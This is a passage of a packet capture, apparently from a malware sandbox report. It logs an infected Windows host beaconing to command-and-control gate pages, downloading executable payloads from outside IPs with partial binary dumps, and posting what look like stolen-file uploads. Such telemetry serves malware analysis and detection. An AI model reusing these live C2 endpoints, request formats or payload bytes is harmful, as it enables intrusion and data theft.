Dec 12, 2024 16:49:14.712687969 CET	1236	IN	Data Raw: 8b 41 14 8b 51 10 83 f8 0f 76 02 8b 09 52 50 50 51 e8 45 00 00 00 83 c4 10 c3 8b 41 14 8b 51 10 83 f8 0f 76 02 8b 09 50 52 50 51 e8 2b 00 00 00 83 c4 10 c3 55 8b ec 8b 45 0c 39 45 08 74 18 8b 51 14 83 fa 0f 76 02 8b 09 50 ff 75 08 52 51 e8 07 00 Data Ascii: AQvRPPQEAQvPRPQ+UE9EtQvPuRQ]UUv<=0hAt3MVuAW}F;F;GVPRW_^]UVW3EffxHvQP,_^]UVW3MQf
Dec 12, 2024 16:49:14.712693930 CET	1236	IN	Data Raw: 5d c2 04 00 6a 20 b8 e9 5b 41 00 e8 87 06 00 00 8b f1 89 75 d4 8b 45 10 8d 4d d8 50 89 75 d4 e8 e2 fb ff ff 83 65 fc 00 8d 45 d8 50 ff 75 0c 8b ce ff 75 08 e8 08 ff ff ff 8d 4d d8 e8 ff fc ff ff c7 06 d0 61 41 00 8b c6 e8 93 06 00 00 c2 0c 00 55 Data Ascii: ]j [AuEMPueEPuuMaAUVuNaA^],AUQuYMP~EUEVtjV;YY^]UQS]Vu;wajX;wSu^VF53;WQPS#NQ
Dec 12, 2024 16:49:14.712699890 CET	108	IN	Data Raw: fe ff ff 68 e8 d7 41 00 8d 45 f4 50 e8 b8 10 00 00 cc 55 8b ec 81 ec 24 03 00 00 6a 17 ff 15 10 cd 41 00 85 c0 74 05 6a 02 59 cd 29 a3 00 f3 41 00 89 0d fc f2 41 00 89 15 f8 f2 41 00 89 1d f4 f2 41 00 89 35 f0 f2 41 00 89 3d ec f2 41 00 66 8c 15 Data Ascii: hAEPU$jAtjY)AAAA5A=AfAfAfAfAf
Dec 12, 2024 16:49:14.832568884 CET	1236	IN	Data Raw: 8c 25 e0 f2 41 00 66 8c 2d dc f2 41 00 9c 8f 05 10 f3 41 00 8b 45 00 a3 04 f3 41 00 8b 45 04 a3 08 f3 41 00 8d 45 08 a3 14 f3 41 00 8b 85 dc fc ff ff c7 05 50 f2 41 00 01 00 01 00 a1 08 f3 41 00 a3 0c f2 41 00 c7 05 00 f2 41 00 09 04 00 c0 c7 05 Data Ascii: %Af-AAEAEAEAPAAAAAAjXkAjXkALjX@ALhbAUjLAuhAhAPPA]UMdA9t=0gAuA]@]Pd5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.10	50040	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:14.271430969 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:14.392460108 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:15.703794956 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.10	50041	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:15.926884890 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:16.046869993 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:17.529053926 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.10	50042	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:17.457714081 CET	142	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11 If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMT If-None-Match: "67594bc0-b1a00"
Dec 12, 2024 16:49:18.771987915 CET	191	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:18 GMT Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT Connection: keep-alive ETag: "67594bc0-b1a00"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.10	50043	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:17.771958113 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:17.891832113 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:19.571932077 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:18 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.10	50045	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:19.823246002 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:19.946252108 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:21.667500973 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:20 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.10	50047	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:21.473332882 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 30 3d 31 30 31 34 34 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1014444001&unit=246122658369
Dec 12, 2024 16:49:22.811755896 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.10	50048	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:21.898684978 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:22.019393921 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:23.477122068 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:22 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.10	50049	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:23.049617052 CET	61	OUT	GET /files/encoxx/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 12, 2024 16:49:24.329493999 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:24 GMT Content-Type: application/octet-stream Content-Length: 393728 Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT Connection: keep-alive ETag: "675a96d4-60200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'FFFFFFFFFFFFRichFPELfebQ@$8gd0:-@.textab `.data`f@.rsrcz0<@@
Dec 12, 2024 16:49:24.329504013 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 6d 05 00 00 00 00 00 88 69 05 00 9c 69 05 00 b4 69 05 00 c8 69 05 00 e2 69 05 Data Ascii: miiiiijj*jDjXjnjjjjjjjjk k6kRkhkpikkkkkkkll(l>lRlblvlll
Dec 12, 2024 16:49:24.329519987 CET	1236	IN	Data Raw: 6c 05 00 bc 6c 05 00 cc 6c 05 00 e2 6c 05 00 f6 6c 05 00 78 6b 05 00 5c 69 05 00 90 71 05 00 80 6d 05 00 9c 6d 05 00 ba 6d 05 00 cc 6d 05 00 d8 6d 05 00 f0 6d 05 00 08 6e 05 00 1a 6e 05 00 2a 6e 05 00 38 6e 05 00 4a 6e 05 00 62 6e 05 00 76 6e 05 Data Ascii: lllllxk\iqmmmmmmnnn8nJnbnvnnnnnnnnnoo8oJoXodonoooooooopp&p2p<pHpZpppppppppqqq<q
Dec 12, 2024 16:49:24.329524994 CET	1236	IN	Data Raw: 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 0d 0a 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20 75 6e Data Ascii: ndicates a bug in your application.R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtua
Dec 12, 2024 16:49:24.329531908 CET	1236	IN	Data Raw: 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b Data Ascii: *+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~=EEE00P('8PW700PP (`h`hhhxppwppGetProcessWindowStationGetUserObjectInformationAGetL
Dec 12, 2024 16:49:24.329538107 CET	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: h(((( H
Dec 12, 2024 16:49:24.329632044 CET	1236	IN	Data Raw: 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Dec 12, 2024 16:49:24.329698086 CET	1236	IN	Data Raw: 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 Data Ascii: '`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'`managed vec
Dec 12, 2024 16:49:24.329705000 CET	1236	IN	Data Raw: 00 00 00 60 2b 40 00 58 2b 40 00 4c 2b 40 00 40 2b 40 00 34 2b 40 00 28 2b 40 00 1c 2b 40 00 14 2b 40 00 08 2b 40 00 fc 2a 40 00 aa 1a 40 00 40 26 40 00 24 26 40 00 10 26 40 00 f0 25 40 00 d4 25 40 00 f4 2a 40 00 ec 2a 40 00 a8 1a 40 00 e8 2a 40 Data Ascii: `+@X+@L+@@+@4+@(+@+@+@+@@@@&@$&@&@%@%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\|@x@t@p@l@h@d@`@\@X@T@P@L@@@4@,@
Dec 12, 2024 16:49:24.329785109 CET	1236	IN	Data Raw: 8b ec b8 f8 15 00 00 e8 c3 ce 00 00 8b 45 08 8b 08 8b 50 04 a1 18 94 45 00 53 56 89 4d f4 8b 0d 1c 94 45 00 89 45 d4 57 8d 45 ec 89 55 e8 c7 45 ec 00 00 00 00 89 4d e0 e8 b2 ff ff ff 81 45 ec 3f 02 00 00 83 3d ec 0b 46 00 14 75 11 6a 00 6a 00 8d Data Ascii: EPESVMEEWEUEME?=FujjRL@ E$E=4@@EME EEuFu=uF@.=ujj@xFUEEEUU3=FF
Dec 12, 2024 16:49:24.449625969 CET	1236	IN	Data Raw: f7 ff ff 51 8d 55 e0 52 8d 45 dc 50 8d 4d e8 51 6a 00 8d 95 c0 ef ff ff 52 6a 00 ff 15 b8 10 40 00 8d 45 ec 50 6a 00 8d 4d c8 51 6a 00 ff 15 1c 10 40 00 46 3b 35 ec 0b 46 00 72 82 33 db 8b 3d 60 10 40 00 33 f6 8b 15 ec 0b 46 00 03 d6 81 fa 8d 00 Data Ascii: QUREPMQjRj@EPjMQj@F;5Fr3=`@3Fu$SPSSSSSSMQ@UR@F\|=@3,}Bq F}\|3l@au]E4HE\|FFt\|5P@=@T@E{=F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.10	50050	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:23.827074051 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:23.947453022 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:25.490935087 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:24 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.10	50055	185.215.113.206	80	7020	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:25.705972910 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file"------IIJEBFCFIJJJEBGDBAKE--
Dec 12, 2024 16:49:27.517986059 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.10	50060	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:25.721683025 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:25.845097065 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:27.321105003 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.10	50061	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:27.566684008 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:27.692012072 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:29.231451035 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.10	50063	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:28.244294882 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014445001&unit=246122658369
Dec 12, 2024 16:49:29.345205069 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.10	50064	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:29.465692997 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:29.585614920 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:32.213334084 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.10	50065	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:29.573822021 CET	62	OUT	GET /files/hell911/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 12, 2024 16:49:30.848037958 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:30 GMT Content-Type: application/octet-stream Content-Length: 2660864 Last-Modified: Tue, 10 Dec 2024 07:14:44 GMT Connection: keep-alive ETag: "6757ea64-289a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AAA@A@'A@A4@A4@A4@A@AAA4@A46AA4@ARichAPELYVg$$$@(dm)@%(@%%@(%p%@$.text2$$ `.rdata^$`$@@.data %%@.rsrc%@%%@@.reloc@((@B
Dec 12, 2024 16:49:30.848189116 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 48 53 8b 5d 14 8b c1 56 8b 75 18 0f bf cb 81 c6 2a 3f 18 59 Data Ascii: UHS]Vu?YM}6/MWUEEKEE?YEbE,EQTEnxEELsE1};EzE.EE6/u}uTE7K+E\mfvAE1};
Dec 12, 2024 16:49:30.848217010 CET	1236	IN	Data Raw: 08 00 00 a3 e0 28 65 00 b8 d4 4c c6 73 d3 e8 33 c9 89 45 e8 a0 ec 28 65 00 04 11 c7 45 e0 00 00 00 00 88 45 ff 0f b6 c3 66 03 45 10 81 c6 0a 6d 29 1b 0f b7 c0 c7 45 f8 ba 61 00 00 89 45 c8 89 75 18 e9 fc 03 00 00 81 fa d4 4c c6 73 0f 86 85 00 00 Data Ascii: (eLs3E(eEEfEm)EaEuLsEP=]gME}5-lU (eECz(eE+EM(eEiLsEMEU iQTEkuU(eY48((eQTm
Dec 12, 2024 16:49:30.848228931 CET	1236	IN	Data Raw: c2 1c 00 0f b6 45 fe 66 39 45 f8 75 3e 2b 75 d4 a1 e0 28 65 00 2b c2 5f 8d 8e 82 41 51 fa d3 e8 8b 4d 0c 80 e9 2d a3 e0 28 65 00 0f b6 05 ca 28 65 00 0f b6 c9 0f af c8 b8 6f c9 00 00 5e 5b 88 0d ca 28 65 00 8b e5 5d c2 1c 00 3b 55 b8 75 2a 8b 4d Data Ascii: Ef9Eu>+u(e+_AQM-(e(eo^[(e];Uu*M+M(e(eof=(e_^[]:]ufMof=(e_^[]uu;u+5(ef(eE_(eo^[]E;~/MMf=(e(eM
